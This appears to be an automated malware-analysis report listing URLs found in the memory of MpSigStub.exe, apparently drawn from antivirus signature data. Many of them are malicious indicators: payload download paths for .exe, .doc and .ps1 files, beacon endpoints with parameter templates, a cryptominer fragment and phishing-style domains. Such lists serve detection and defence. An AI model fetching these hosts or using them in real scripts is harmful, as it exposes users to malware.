Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://188.127.254.159/
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://188.166.41.131/momo.php
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://190.14.37.190/
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://190.14.37.191/
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://192.168.0.108/download.ps1
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://192.168.0.17/adultcont
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://192.168.100.5/00ButtonTest.exe
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://192.168.88.
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://192.227.228.85/.--...........................................................................
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://192.3.141.134/document_m.doc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://192.3.141.173/word/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://192.3.152.134/nda/document.doc
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://192.3.22.5/.-................................................................................
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://193.203.202.55/
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://193.38.55.92/gfmppbpq
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://194.145.227.21sys=$(date
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://194.178.112.202
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://194.5.249.101/api.php
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://194.5.249.107/2nquxqz2ok4a45l.php
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://195.123.210.174/
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://195.123.219.21/campo/t3/t3d
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://195.123.220.249/campo/t2/t2dcdddebp%&c
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://195.123.235.1/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://195.78.108.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://195.95.218.173/dl/dl.php?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://195.95.218.173/troys/
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://198.12.127.217/.--------------------------.--------------........-...................-/_.....
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: http://198.23.212.187/_......................................_......................-/
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: http://198.23.213.25/document.doc
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://198.46.132.163/
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: http://198.46.132.185/.--_------------------------------------------.-----/
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://198.46.201.115/.-...................................................-.-/..-------------------
Source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp String found in binary or memory: http://198.50.114.16
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://1animalsnames.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://1bestgate.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://200.159.128.
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://2010-kpss.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://2012-wallpaper-hd.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://2014secimleriturkiye.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://202.104.11.94
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://203.199.200.61
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://205.177.124.74/
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://205.185.116.78/
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/FQL66n
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/b9xbb3
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/files/may13.bin
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/khkwZF
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://205.185.125.104/1t1nnx
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: http://205.185.125.104/pqbtwj
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: http://205.185.125.104/yxsz8k
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://205.252.24.246/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://207.154.225.82/report.json?type=mail&u=$muser&c=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://207.226.171.35/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://207.226.171.36/
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://207.226.177.108/sc.exe
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://208.95.104.
Source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/Q-2/
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/q-2/dy5434app14.exe
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/q-2/img_0107803.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://209.190.122.186/drm/license-savenow.asp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://209.200.12.164/drm/provider_license_v7.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://209.62.108.213/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://209.62.108.220/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.203/xx/kl.exe
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.203/xx/kl.exex
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: http://212.237.58.208/0607/
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://212.86.115.71/template.doc
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://213.159.117.134/index.php
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://213.159.213.195/d.exe
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://216.170.114.73/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://216.93.188.81/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://217.73.6
Source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117.60/arty.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://218.204.253.145/setup.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://220.73.162.2/Download
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://220.73.162.4/Download
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://23.244.141.185/cgi-bin
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.31/concord/
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://23.95.231.200/images/footer1.dll
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://24-7-search.com/
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://2fa.com-token-auth.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://2ndrequest.me/
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://2udating.com
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://2udating.net
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://31.192.209.
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://31.192.210.
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://31.192.211.
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://31.210.20.225:8080/server.exe&quot;)
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://3117488091/lib/jquery-3.2.1.min.js
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://365well.org/zload/get_exe.php?l=
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://37.120.206.70/dom/d.wbk
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://37.120.206.70/mend/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://37.120.206.70/mend/m.wbk
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://37.187.248.215/promo.php
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://3dplayful.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://3gool.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://3novices.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://3rbfilm.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp String found in binary or memory: http://3z.fi/evil1/PMwGWkmh
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://45.12.32.58/
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://45.12.32.87/
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://45.12.32.9/
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://45.138.157.216/44313
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://45.144.30.16/
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://45.145.185.85xmr=network001sys=sysrv002#killoldfilespkill-9
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://45.150.67.233/
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://45.55.29.117/download/nsis/pb_nsissetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://45.63.107.19/PhilaeAp05.cpl
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://45.67.230.159/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://45.77.255.68/5.sctscrobj.dll
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://45.84.1.195/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://45.89.127.230/images/yellowtank.png-o%appdata%
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://45.9.148.35/chimaera/bin/rpm_deb_apk/x86_64/openssh.rpm
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://45.9.148.35/chimaera/sh/
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://45.90.59.77/
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: http://45.90.59.97/44313
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: http://46.243.136.238/
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://4udating.net
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://5.135.73.116/win/document_0120200.doc
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: http://5.34.180.57/44313
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://5.39.217.221/win/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://50.63.128.
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: http://51.254.164.244/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://51.81.114.167:
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://513389.cn/
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://54.214.246.97/log/SilentUpdater7/install
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%d
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%dx
Source: MpSigStub.exe, 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp String found in binary or memory: http://56489.eu5.org
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://58.65.235.3/up/get_exa.php?l=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://58.65.239.124/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://58.65.239.82
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://5starvideos.com/main/
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://5starvideos.com/main/K
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://5starvideos.com/main/K5
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://61.135.159.183/installer/sobar.exe
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://61.19.253.
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://62.109.31.216/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://62.210.214.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://63.219.176.248/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/CFL/
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/EX/
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/EX/x
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/K/F
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/NL2/?w=
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://64.156.31.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://64.27.0.205
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://64.27.0.205/up/calc2.bin
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.58/trafc-2/rfe.php
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.58/trafc-2/rfe.phpg
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.80/80
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://66.40.9.246/binaries
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://66.98.138.92/PH/
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://67.15.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://67.18.111.82:8088
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://67.210.122.222/~turks/lego/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://68.178.225.162
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://69.31.80.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://69.31.84.223/
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://69.50.164.11/v1/mh.php?pid=%s&cid=%s&p=%s&t=%s&vh=%i&vt=%i
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://6tof.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18278560090.0000021B5F382000.00000004.00000001.sdmp String found in binary or memory: http://7-.j-z-0-3-0-u-u-x-f-1l-3-l-h-w-b-q-z-u-5-n-l-l-m-s-5-v-s-z-g.info
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://75.127.1.211/hkcmd/document.doc
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://76h1.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://77.81.225.138/carnaval2017.zip
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://78.128.92.26/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://78.157.143.251
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://78.24.220.183/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://79.110.52.186/fide/f.wbk
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://79.110.52.186/naki/n.wbk
Source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp String found in binary or memory: http://8.8.8.8/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://80.69.160.
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://81.16.141.208/q37kkp
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://82.118.23.186/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://82.98.119.68/wp-admin/app/alim.doc
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://82.98.119.68/wp-admin/app/updates.doc
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://82.98.235.
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://82.98.235.63/cgi-bin/check/autoaff3
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://83.136.232.110/44285
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://83.149.75.54/cgi-bin
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://83.166.242.164/desktop-st7lsde/
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://83.166.242.164/desktop-st7lsde/bid/relay.dot
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://83.166.242.164/desktop-st7lsde/nay.dot
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://83.166.246.59/sgz2/rejoice/lowered.dot
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://85.17.138.60
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.17.138.60/mpgcodec/codec.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.17.138.60/traf/fg.php
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://85.17.3.151/cgi-bin
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.17.93.189/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.17.93.189/iddq/m
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.234.191.170/inst.php?id=
